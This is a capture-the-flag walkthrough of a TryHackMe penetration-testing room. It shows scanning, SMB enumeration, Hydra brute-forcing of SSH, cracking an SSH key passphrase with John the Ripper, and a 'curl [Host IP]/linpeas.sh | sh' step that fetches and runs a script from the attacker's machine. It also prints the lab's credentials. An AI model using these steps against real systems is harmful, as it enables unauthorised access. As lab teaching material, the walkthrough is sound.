Basic Penetration Testing

URL --> https://tryhackme.com/room/basicpentestingjt
Target URL will change as I had to restart the machine. It will most likely change for you so make sure you use the one given to you by THM.

Tasks:

1. Discover what services are running on the machine.

Start by running a basic nmap scan to see what services are available.

nmap [Target URL]

Looks like quite a few services are open. I'll save a more detailed scan for later if needed.

2. What is the name of the hidden directory on the web server (enter the name without /)?

Looks like from before, Port 80 is open which is usually an indicator that a web server is running and may be accessed from your browser. Let's check that out.
Nothing of note on the web server page. Check the source code as well to see if there are any comments with important information.
Doesn't look like anything to note except a hint if we need help.
Since we have a web server available, let's run gobuster to see if we can discover some subdomains.

gobuster dir -u http://[Target_IP]:[Port]/ -w /usr/share/dirb/wordlists/common.txt

Any page with a 403 code is forbidden to access.
/index.html is the home page that is under development so that isn't helpful.
That leaves us with the /development subdomain which redirects to http://[Target URL]/development/
Looks like we have access to some .txt files that may be helpful.
So it looks like we know the following:
- SMB has been configured.
  - Should look for a possible exploitation here.
- They are using version 2.5.12 of something.
  - This note indicates they may be using an older version which may have a vulnerability we can exploit.
  - We'll run a more detailed nmap scan to see if we can identify what services and versions they are running.
```
nmap -sV -sC -p 22,80,139,445,8009,8080 [Target URL]
```
Looks like there are some credentials on the /etc/shadows directory that are hashed but pretty easy to break.
- Once I gain access, I should check this directory.
It looks like we have two potential users --> J & K.
- I'm assuming these are short for first names.
Base on the information they are giving me, I'm going to start by taking a look at the SMB service running. I'll start by checking to see what shares may be accessible.

smbclient -L [Target URL]

Looks like there is an anonymous share available. Let's try accessing that.

smbclient //[Target URL]/Anonymous

Hit enter when prompted for a password.
Looks like the we have access. I typed in the command ls to see what is available. There is a staff.txt file in the current directory. Download the file to your host machine to see.

get staff.txt

Seems harmless enough but I now know what J & K stand for.
- Possible usernames include Jan and Kay.
It doesn't look like we have access to any other part of the system from this share.

3. User brute-forcing to find the username & password.

Exploring the file directory from the previous task gives us some good information.

4. What is the username?

Based on file from the previous task we know there is probably a username of either Jan or Kay.

5. What is the password?

We won't be able to brute force the smb server (I tried) but let's instead try the ssh service since we know that service is open. Let's use Hydra to try to brute force Jan's account. Based on one of the previous text files we found, we know it's probably a good chance that they have a pretty basic password that can be found easily.

hydra -V -l jan -P [password list] ssh://[Target IP]

This will take a while but eventually should kick back a valid password.
Note: you don't have to use the -V flag. I just like to see something that says it is still working.

6. What service do you use to access the server (answer in abbreviation in all caps)?

Based on the previous task it is SSH.

7. Enumerate the machine to find any versions for privilege escalation.

Using the credentials jan:armando, login to the SSH service using:

ssh jan@[Target IP]

You should now have access to the users account. Let's browse around a bit to see what we can do.
Looks like there is a possible password backup file in /home/kay that cannot be accessed.
Digging around the same directory we can find some other files:
- Looks like there is some good info in the hidden .ssh directory.
- From here I can get the private and public keys for SSH.
- Private key:

The public key is:

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCzAsDwjb0ft4IO7Kyux8DWocNiS1aJqpdVEo+gfk8Ng624b9qOQp7LOWDMVIINfCuzkTA3ZugSyo1OehPc0iyD7SfJIMzsETFvlHB3DlLLeNFm11hNeUBCF4Lt6o9uH3lcTuPVyZAvbAt7xD66bKjyEUy3hrpSnruN+M0exdSjaV54PI9TBFkUmmqpXsrWzMj1QaxBxZMq3xaBxTsFvW2nEx0rPOrnltQM4bdAvmvSXtuxLw6e5iCaAy1eoTHw0N6IfeGvwcHXIlCT25gH1gRfS0/NdR9cs78ylxYTLDnNvkxL1J3cVzVHJ/ZfOOWOCK4iJ/K8PIbSnYsBkSnrIlDX27PM7DZCBu+xhIwV5z4hRwwZZG5VcU+nDZZYr4xtpPbQcIQWYjVwr5vF3vehk57ymIWLwNqU/rSnZ0wZH8MURhVFaNOdr/0184Z1dJZ34u3NbIBxEV9XsjAh/L52Dt7DNHWqUJKIL1/NV96LKDqHKCXCRFBOh9BgqJUIAXoDdWLtBunFKu/tgCz0n7SIPSZDxJDhF4StAhFbGCHP9NIMvB890FjJE/vys/PuY3efX1GjTdAijRa019M2f8d0OnJpktNwCIMxEjvKyGQKGPLtTS8o0UAgLfV50Zuhg7H5j6RAJoSgFOtlosnFzwNuxxU05ozHuJ59wsmn5LMK97sbow== I don't have to type a long password anymore!

I tried logging into the Kay's account with the private key. I saved the private key on my host machine under a new file called id_rsa.pem
- This is the typical naming convention for a private key.

ssh -i id_rsa.pem kay@[Target IP]

Unfortunately, it then asks me for a passphrase. I tried using the phrase at the end of the public key but no luck.
Let's use johntheripper to try to get the passphrase from the key.
Start by converting the private key to a readable file.
- Download ssh2john.py to convert the rsa key to a readable file to crack. There are a lot of these for other hash types.

python3 ssh2john.py id_rsa.pem > john.txt

Then we can run this through John The Ripper with the rockyou passwords list to see if we can get something.

john john.txt --wordlist=[Path to wordlist]

This kicks out a phrase of "beeswax"
Now I'll try ssh'ing back into kay's account and input that passphrase.

ssh -i [Path to private key] kay@[Target IP]

After you put in the passphrase "beeswax" you should now have access to kay's account.
Take a look at the pass.bak file in their home directory.
- heresareallystrongpasswordthatfollowsthepasswordpolicy$$

LinPeas

I decided to also run linpeas to see what it would pull up.
- Download linpeas

wget "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" -O linpeas.sh

On the host machine, start up a python web server in the directory that has linpeas downloaded.

sudo python3 -m http.server 80

On the target machine download and run the file:

curl [Host IP]/linpeas.sh | sh

Scanning through the output two things pop up:
- The machine has a vulnerability that allows privilege escalation
  - Vulnerable to CVE-2021-4034
  - I'm pretty sure this is just a vulnerability. I was trying to get an exploit for it to work but wasn't successful.
- The scan also revealed the private keys we found before on kay's directory.